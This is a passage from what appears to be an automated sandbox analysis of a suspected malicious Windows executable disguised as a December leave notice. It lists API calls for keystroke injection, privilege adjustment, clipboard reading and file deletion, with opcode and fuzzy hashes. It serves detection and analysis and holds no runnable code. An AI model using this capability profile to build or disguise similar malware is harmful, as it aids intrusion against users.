                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: f76ce6502307def062e5a28f09c4d62449cb4dcff4e096b39e52d72960f8da9e
                                                      • Instruction ID: 1f075c5dee83c6740a71429428eadb50b1d7b93dfb7528d33f0c18eae05f9440
                                                      • Opcode Fuzzy Hash: f76ce6502307def062e5a28f09c4d62449cb4dcff4e096b39e52d72960f8da9e
                                                      • Instruction Fuzzy Hash: 5EF039B1909703DFCB34AFA4D890896BBE4BF053253248A3EF1D682610C732A840EF50
                                                      Function 00F840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F840C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath
                                                      • String ID:
                                                      • API String ID: 82841172-0
                                                      • Opcode ID: f00a9db60a3f658eefa1cf301ec3841c56bf63a8abfdb141633195ab892b068d
                                                      • Instruction ID: 0f8a93d63e90b2d9614e5fb23b6eaf838feb2f4e4fa894f5d109725b2e19e39a
                                                      • Opcode Fuzzy Hash: f00a9db60a3f658eefa1cf301ec3841c56bf63a8abfdb141633195ab892b068d
                                                      • Instruction Fuzzy Hash: 8EE0CD765001245BC711A794CC46FEA779DDF88690F050075F905D7244DD6CD9819790
                                                      Function 01A4C080 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 01A4C091
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: c17c79bf7e14d2599be58fce2c3f6e343b433c32667fedf4c67a4911971bd71c
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: EDE0E67494110DDFDB00EFB4D54969E7FB4EF44711F100161FD05D2281D6719D508A62

                                                      Non-executed Functions

                                                      Function 00FEF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00FEF87D
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FEF8DC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FEF919
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FEF940
                                                      • SendMessageW.USER32 ref: 00FEF966
                                                      • _wcsncpy.LIBCMT ref: 00FEF9D2
                                                      • GetKeyState.USER32(00000011), ref: 00FEF9F3
                                                      • GetKeyState.USER32(00000009), ref: 00FEFA00
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FEFA16
                                                      • GetKeyState.USER32(00000010), ref: 00FEFA20
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FEFA4F
                                                      • SendMessageW.USER32 ref: 00FEFA72
                                                      • SendMessageW.USER32(?,00001030,?,00FEE059), ref: 00FEFB6F
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00FEFB85
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FEFB96
                                                      • SetCapture.USER32(?), ref: 00FEFB9F
                                                      • ClientToScreen.USER32(?,?), ref: 00FEFC03
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FEFC0F
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00FEFC29
                                                      • ReleaseCapture.USER32 ref: 00FEFC34
                                                      • GetCursorPos.USER32(?), ref: 00FEFC69
                                                      • ScreenToClient.USER32(?,?), ref: 00FEFC76
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FEFCD8
                                                      • SendMessageW.USER32 ref: 00FEFD02
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FEFD41
                                                      • SendMessageW.USER32 ref: 00FEFD6C
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FEFD84
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FEFD8F
                                                      • GetCursorPos.USER32(?), ref: 00FEFDB0
                                                      • ScreenToClient.USER32(?,?), ref: 00FEFDBD
                                                      • GetParent.USER32(?), ref: 00FEFDD9
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FEFE3F
                                                      • SendMessageW.USER32 ref: 00FEFE6F
                                                      • ClientToScreen.USER32(?,?), ref: 00FEFEC5
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FEFEF1
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FEFF19
                                                      • SendMessageW.USER32 ref: 00FEFF3C
                                                      • ClientToScreen.USER32(?,?), ref: 00FEFF86
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FEFFB6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FF004B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 2516578528-4164748364
                                                      • Opcode ID: be039df2e0da2483eda8f01be7b7eb2d3b106d5e6ad2e2d45c77b76a1917a3a6
                                                      • Instruction ID: bd986dcd8f790e5517a6e5a298fb396ac8c275a650b0dcaf3361f19c1a41ea97
                                                      • Opcode Fuzzy Hash: be039df2e0da2483eda8f01be7b7eb2d3b106d5e6ad2e2d45c77b76a1917a3a6
                                                      • Instruction Fuzzy Hash: 0E32F374A04384EFDB21CF64C884B6ABBA4FF48364F144629F695C72A1C735ED48EB51
                                                      Function 00FEAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00FEB1CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 3850602802-328681919
                                                      • Opcode ID: 75e9c875fee66ee3e3635b0376398c2867cc59a6f738ede0d8e0abb17e6394b0
                                                      • Instruction ID: 0deb6a9c04542dd2015ccbd8d170f0dd950e4619a4415e11e361a7bccc3e3f49
                                                      • Opcode Fuzzy Hash: 75e9c875fee66ee3e3635b0376398c2867cc59a6f738ede0d8e0abb17e6394b0
                                                      • Instruction Fuzzy Hash: 99121671900288ABEB258F6ACC49FAF7BB8FF45320F104119F916DB1D1DB799901EB21
                                                      Function 00F9EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 00F9EB4A
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FF3AEA
                                                      • IsIconic.USER32(000000FF), ref: 00FF3AF3
                                                      • ShowWindow.USER32(000000FF,00000009), ref: 00FF3B00
                                                      • SetForegroundWindow.USER32(000000FF), ref: 00FF3B0A
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FF3B20
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FF3B27
                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00FF3B33
                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00FF3B44
                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00FF3B4C
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FF3B54
                                                      • SetForegroundWindow.USER32(000000FF), ref: 00FF3B57
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B6C
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3B77
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B81
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3B86
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B8F
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3B94
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF3B9E
                                                      • keybd_event.USER32(00000012,00000000), ref: 00FF3BA3
                                                      • SetForegroundWindow.USER32(000000FF), ref: 00FF3BA6
                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00FF3BCD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 71edd5472cc4ed20501c77cae9d034423415c301f2efd60f0b9c4b17aa898345
                                                      • Instruction ID: e35a3ddf8f89e9f522ea60429a3e13efa92ab5babe2c064c52b762141ddd93f4
                                                      • Opcode Fuzzy Hash: 71edd5472cc4ed20501c77cae9d034423415c301f2efd60f0b9c4b17aa898345
                                                      • Instruction Fuzzy Hash: CB313E71A40318BBEB316BE59C49F7E7E6CEF84B60F104015FB45AA1D1DAB65900ABB0
                                                      Function 00FBACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FBB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FBB180
                                                        • Part of subcall function 00FBB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FBB1AD
                                                        • Part of subcall function 00FBB134: GetLastError.KERNEL32 ref: 00FBB1BA
                                                      • _memset.LIBCMT ref: 00FBAD08
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FBAD5A
                                                      • CloseHandle.KERNEL32(?), ref: 00FBAD6B
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FBAD82
                                                      • GetProcessWindowStation.USER32 ref: 00FBAD9B
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00FBADA5
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FBADBF
                                                        • Part of subcall function 00FBAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FBACC0), ref: 00FBAB99
                                                        • Part of subcall function 00FBAB84: CloseHandle.KERNEL32(?,?,00FBACC0), ref: 00FBABAB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 015305ba37df98e9806d308ae03c0f6f7c1a3ff0386af8b4526e6f82c5d225ab
                                                      • Instruction ID: 891dae29b44e63314b2e4855f0a914e9d0ca9604c21f2aefeb3741e174d44909
                                                      • Opcode Fuzzy Hash: 015305ba37df98e9806d308ae03c0f6f7c1a3ff0386af8b4526e6f82c5d225ab
                                                      • Instruction Fuzzy Hash: E9817CB1C00209AFEF229FE6DC45AEEBB78EF08314F044119F914A6151DB768E55EF61
                                                      Function 00FC60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FC5FA6,?), ref: 00FC6ED8
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FC5FA6,?), ref: 00FC6EF1
                                                        • Part of subcall function 00FC725E: __wsplitpath.LIBCMT ref: 00FC727B
                                                        • Part of subcall function 00FC725E: __wsplitpath.LIBCMT ref: 00FC728E
                                                        • Part of subcall function 00FC72CB: GetFileAttributesW.KERNEL32(?,00FC6019), ref: 00FC72CC
                                                      • _wcscat.LIBCMT ref: 00FC6149
                                                      • _wcscat.LIBCMT ref: 00FC6167
                                                      • __wsplitpath.LIBCMT ref: 00FC618E
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FC61A4
                                                      • _wcscpy.LIBCMT ref: 00FC6209
                                                      • _wcscat.LIBCMT ref: 00FC621C
                                                      • _wcscat.LIBCMT ref: 00FC622F
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00FC625D
                                                      • DeleteFileW.KERNEL32(?), ref: 00FC626E
                                                      • MoveFileW.KERNEL32(?,?), ref: 00FC6289
                                                      • MoveFileW.KERNEL32(?,?), ref: 00FC6298
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00FC62AD
                                                      • DeleteFileW.KERNEL32(?), ref: 00FC62BE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FC62E1
                                                      • FindClose.KERNEL32(00000000), ref: 00FC62FD
                                                      • FindClose.KERNEL32(00000000), ref: 00FC630B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1917200108-1173974218
                                                      • Opcode ID: b55ce66d67b2398abda57fe54122187d5cb94e7482970be83251261ce61ed295
                                                      • Instruction ID: 808743e5b603819af69dcb1497c9270ded37fee3ec4594f01b19a8a62ee19d16
                                                      • Opcode Fuzzy Hash: b55ce66d67b2398abda57fe54122187d5cb94e7482970be83251261ce61ed295
                                                      • Instruction Fuzzy Hash: C4512EB2C0821D6ACF21EB91CD45EEB77BCAF05310F0901EAE585E2141DE369789DFA4
                                                      Function 00FD6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32(0101DC00), ref: 00FD6B36
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FD6B44
                                                      • GetClipboardData.USER32(0000000D), ref: 00FD6B4C
                                                      • CloseClipboard.USER32 ref: 00FD6B58
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FD6B74
                                                      • CloseClipboard.USER32 ref: 00FD6B7E
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FD6B93
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00FD6BA0
                                                      • GetClipboardData.USER32(00000001), ref: 00FD6BA8
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FD6BB5
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FD6BE9
                                                      • CloseClipboard.USER32 ref: 00FD6CF6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                      • String ID:
                                                      • API String ID: 3222323430-0
                                                      • Opcode ID: 1205316f65f3ae518668a5bff01e9ab45ca5550a29f36e7f7b85feafab5fc659
                                                      • Instruction ID: 04d97a159e086b3b2021674fd4c464a9c299e94199d453956856268c264304e2
                                                      • Opcode Fuzzy Hash: 1205316f65f3ae518668a5bff01e9ab45ca5550a29f36e7f7b85feafab5fc659
                                                      • Instruction Fuzzy Hash: B451B431200201ABD311FFA0CD86F6E77A9AF98B21F04052AF586D72D1DF79D805AB72
                                                      Function 00FCF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FCF62B
                                                      • FindClose.KERNEL32(00000000), ref: 00FCF67F
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FCF6A4
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FCF6BB
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FCF6E2
                                                      • __swprintf.LIBCMT ref: 00FCF72E
                                                      • __swprintf.LIBCMT ref: 00FCF767
                                                      • __swprintf.LIBCMT ref: 00FCF7BB
                                                        • Part of subcall function 00FA172B: __woutput_l.LIBCMT ref: 00FA1784
                                                      • __swprintf.LIBCMT ref: 00FCF809
                                                      • __swprintf.LIBCMT ref: 00FCF858
                                                      • __swprintf.LIBCMT ref: 00FCF8A7
                                                      • __swprintf.LIBCMT ref: 00FCF8F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 835046349-2428617273
                                                      • Opcode ID: d8ddc5f97cd71b7520719fae278fa155522ba8a3f9bbe3237b3e1ae70c6a7c15
                                                      • Instruction ID: 126c2226dc83816a48dbb0dd6b7b077df261960881e83df8413b16161c88fff1
                                                      • Opcode Fuzzy Hash: d8ddc5f97cd71b7520719fae278fa155522ba8a3f9bbe3237b3e1ae70c6a7c15
                                                      • Instruction Fuzzy Hash: 83A130B2408344ABD750EBA4CD86DAFB7ECBF98704F44082EF595C2151EB38D949E762
                                                      Function 00FD1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FD1B50
                                                      • _wcscmp.LIBCMT ref: 00FD1B65
                                                      • _wcscmp.LIBCMT ref: 00FD1B7C
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00FD1B8E
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00FD1BA8
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FD1BC0
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1BCB
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00FD1BE7
                                                      • _wcscmp.LIBCMT ref: 00FD1C0E
                                                      • _wcscmp.LIBCMT ref: 00FD1C25
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD1C37
                                                      • SetCurrentDirectoryW.KERNEL32(010339FC), ref: 00FD1C55
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FD1C5F
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1C6C
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1C7C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 4a7bf5e932aaa6182685df758d009cc49698c840a409dd0a4e26367f0d9c64f4
                                                      • Instruction ID: 7cbfcda5c47df0a560c46207f5f9b4999dd95c79e8645dc5b93c68a76f648d65
                                                      • Opcode Fuzzy Hash: 4a7bf5e932aaa6182685df758d009cc49698c840a409dd0a4e26367f0d9c64f4
                                                      • Instruction Fuzzy Hash: 1B31D332A40219BFDF21ABF0DC49ADE77ADBF45320F180167E841E2180EB35DA459B64
                                                      Function 00FD1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FD1CAB
                                                      • _wcscmp.LIBCMT ref: 00FD1CC0
                                                      • _wcscmp.LIBCMT ref: 00FD1CD7
                                                        • Part of subcall function 00FC6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FC6BEF
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FD1D06
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1D11
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00FD1D2D
                                                      • _wcscmp.LIBCMT ref: 00FD1D54
                                                      • _wcscmp.LIBCMT ref: 00FD1D6B
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD1D7D
                                                      • SetCurrentDirectoryW.KERNEL32(010339FC), ref: 00FD1D9B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FD1DA5
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1DB2
                                                      • FindClose.KERNEL32(00000000), ref: 00FD1DC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
